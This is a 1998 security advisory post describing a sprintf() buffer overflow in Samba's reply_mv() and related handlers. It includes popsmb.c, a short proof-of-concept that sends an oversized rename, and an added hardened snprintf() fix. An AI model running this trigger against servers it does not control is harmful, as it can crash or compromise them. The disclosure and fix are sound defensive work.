Date: Sun, 10 May 1998 12:43:32 -0400
From: Drago <[email protected]>
To: [email protected]
Subject: Samba problems
Hello,
While browsing the samba sources a while ago I noticed problems in a few
areas of the reply handling for file requests. I just took a look at the
latest source code (samba-1.9.18p5) and found the same problems that I
saw in the previous release. A possible buffer overflow exists in many
areas of the code.
smb.h:typedef char pstring[1024];
reply.c - reply_mv(char *inbuf,char *outbuf,int dum_size, int dum_buffsize):3066
...
3200: pstring fname;
...
* 3206: sprintf(fname,"%s/%s",directory,dname);
..
I have seen a lot of issues about strcpy() and how strncpy() should be used
instead. Very few times have I seen anything about sprintf()/snprintf(),
which also have the same issues that people have with strcpy() as far as
buffer overflows go. An easy fix for this is to simply change line 3206
to use snprintf(). In many other areas of reply.c are the same problems
that are in reply_mv (reply_unlink(), and a few others).
I would recommend that you kill samba until a patch is released, or patch
it yourself if you know how to rewrite it correctly.
Someone feel free to try this against a Windows machine; I haven't had a
chance to try it. The program I included can be used to test a mounted
samba fs.
Later.
[email protected]
Attachment: popsmb.c (decoded from the base64 MIME part)

/* By Drago ([email protected]) */
/* Run this in a smb mounted directory to test if the system */
/* is vulnerable in reply_mv */

#include <unistd.h>
#include <stdio.h>

int main(void) {
    /* 2048 'F' characters plus one byte for the terminating NUL.
       The attached original declared buf[2048] and then wrote the
       NUL to buf[2048], one byte past the end of the array. */
    char buf[2049];
    int i=0;
    while (i<2048) buf[i++]='F';
    buf[i]=0;
    /* rename() becomes an SMB rename request, which the server
       handles in reply_mv() */
    rename(buf, buf);
    return 0;
}
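The following is an added illustration, not Samba code and not part of Drago's message. It reproduces the pstring type from smb.h, shows why the sprintf() call at line 3206 overflows a 1024-byte pstring when fed a name such as the 2048-character one popsmb.c sends, and contrasts it with the snprintf()-based replacement the message recommends. The share path "/export/share" and the function names are assumptions made for the example. One point the message does not spell out: snprintf() alone would silently truncate the path to 1023 characters, so the hardened version checks the length snprintf() reports and rejects the request instead of operating on a different, shorter path.

```c
/* Added example (not Samba's code): checked path join for reply_mv-style
 * "%s/%s" formatting into a fixed-size pstring. */
#include <stdio.h>
#include <string.h>

typedef char pstring[1024];   /* same definition as samba's smb.h */

/* Bytes that "directory/dname" needs, including the terminating NUL.
 * The unfixed sprintf(fname,"%s/%s",directory,dname) writes exactly this
 * many bytes into fname no matter that fname holds only 1024. */
size_t joined_len(const char *directory, const char *dname)
{
    return strlen(directory) + 1 + strlen(dname) + 1;
}

/* Hardened join. Returns 0 and fills fname on success; returns -1 and
 * leaves fname empty if the result would not fit. snprintf() returns the
 * length the complete string would have had, so an over-long request is
 * detected and refused rather than truncated to a plausible-looking path. */
int join_path_checked(pstring fname, const char *directory, const char *dname)
{
    int n = snprintf(fname, sizeof(pstring), "%s/%s", directory, dname);
    if (n < 0 || (size_t)n >= sizeof(pstring)) {
        fname[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructed input mirroring popsmb.c: a 2048-character file name.
 * Returns 1 if the checked join refuses it and the unchecked sprintf()
 * would have needed more than the pstring holds. */
int long_name_is_rejected(void)
{
    static char dname[2049];
    pstring fname;
    memset(dname, 'F', 2048);
    dname[2048] = '\0';
    return join_path_checked(fname, "/export/share", dname) == -1
        && joined_len("/export/share", dname) > sizeof(pstring);
}

int main(void)
{
    pstring fname;
    if (join_path_checked(fname, "/export/share", "report.txt") == 0)
        printf("ok: %s\n", fname);
    printf("2048-char name rejected: %s\n",
           long_name_is_rejected() ? "yes" : "no");
    return 0;
}
```

The same pattern applies to the other reply.c handlers the message names (reply_unlink() and the rest): every sprintf() into a pstring becomes an snprintf() whose return value is compared against the buffer size, with the request failed when it does not fit.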